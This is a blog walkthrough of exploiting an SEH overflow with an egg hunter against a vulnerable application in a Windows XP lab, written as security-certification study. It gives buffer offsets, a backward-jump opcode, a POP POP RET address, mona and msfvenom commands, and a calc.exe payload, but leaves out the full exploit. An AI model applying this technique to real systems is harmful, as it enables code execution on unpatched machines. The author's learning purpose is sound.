As the OSCP PWK course only covered basic stack-based overflow exploitation, I decided to learn about SEH overflows and the concept of egg hunters!
I will not be talking about the theory behind those 2 in this post.
Instead, I will be writing up how to exploit them.
I will re-write the existing exploit from scratch and hopefully it might be helpful to some of you haxxers out there!
Understanding of Buffer Overflows (Simple stack based)
Configured Immunity Debugger and Mona.py
Read up on nSEH/SEH Overflow concepts
Read up on EggHunter concepts
Existing exploit available at –
Vulnerable application that we are attacking –
My target VM:
Windows XP SP3
My attacking VM:
Set up with Immunity Debugger and Mona.py
The application will crash with 4500 of junk buffer.
After sending 4500 junk buffer, press Shift + F9 to pass the exception and you should see that the EIP register is overwritten by “A”s
pattern_create.rb -l 4500
pattern_offset.rb -q $overwritten_eip_value
offset = 4065
Minus 4 from the offset to overwrite it with “C” buffer instead for the SEH handler
Your exploit PoC should look something like this:
junk = “A” * 4061 + “B” * 4 + “C” * 4 + “D” * 431
“B” -> nSEH
“C” -> SEH
Launch the exploit PoC, it should trigger an access violation, continue by passing it with Shift+F9, you should notice that the EIP are overwritten with 43434343 (“C”*4)
Now we should look for the address of a POP POP RETN instruction so we can land onto our “B” * 4 (nSEH) buffer. Run “!mona seh” on the Immunity Debugger console.
Locate your Immunity Debugger folder (Example: C:\Program Files\Immunity Inc\Immunity Debugger)
It will contain all the POP POP RET addresses, choose 1 that does not contain any dangerous bytes such as \x00
I decided on the address 0x1002379d
Replace the “C” * 4 with the PPR address that you have chosen
Restart your Immunity Debugger and reattach the process by pressing CTRL + F2, go to your PPR address 1002379d and set a breakpoint.
Rerun your updated PoC exploit. Shift + F9 to pass the exception first, then Step over with F7, you should end up at the “B” * 4 buffers after stepping over the POP POP RETN instructions.
Step over the POP POP RETN with F7.
Now we need to jump backward into our “A” buffers
“\xEB\xC4\x90\x90” will jump backwards 60 bytes (-60bytes on calculator)
Update your PoC exploit and replace the “B” * 4 with “\xEB\xC4\x90\x90”
Your PoC exploit should look something like this.
Set a breakpoint at your chosen PPR address again and rerun your updated PoC exploit. Shift + F9 to pass the exception first, then Step over with F7, you should end up at the “B” * 4 which is now replaced with “\xEB\xC4\x90\x90” (jump backward 60bytes) and by stepping over again, you should land in the “A” buffers.
The “\xEB\xC4\x90\x90” in Immunity Debugger.
Stepping over with F7 should land you into the “A” buffer.
Nice. You are all set to send your Egg Hunter tag, shellcode, and everything else in 1 go!
Generate your Egg Hunter tag with the following command on Immunity Debugger console.
!mona egg -t p0rn
Copy paste the generated 32 bytes hex codes into your PoC exploit.
Generate your shellcode with msfvenom:
msfvenom -p windows/exec cmd=calc.exe -e x86/alpa_mixed -f -c
Your final exploit PoC should look something like this:
All is set, embrace teh calculator!
Note that there are other ways to pwn this application. Just having my own way of fun.
I have decided to exclude my full exploit code so that you can try it out yourself!
I know that SEH Overflows and Egg Hunter concept are obsolete. But…… It is always good to learn new stuff! Well at least for me.
Stay safe people!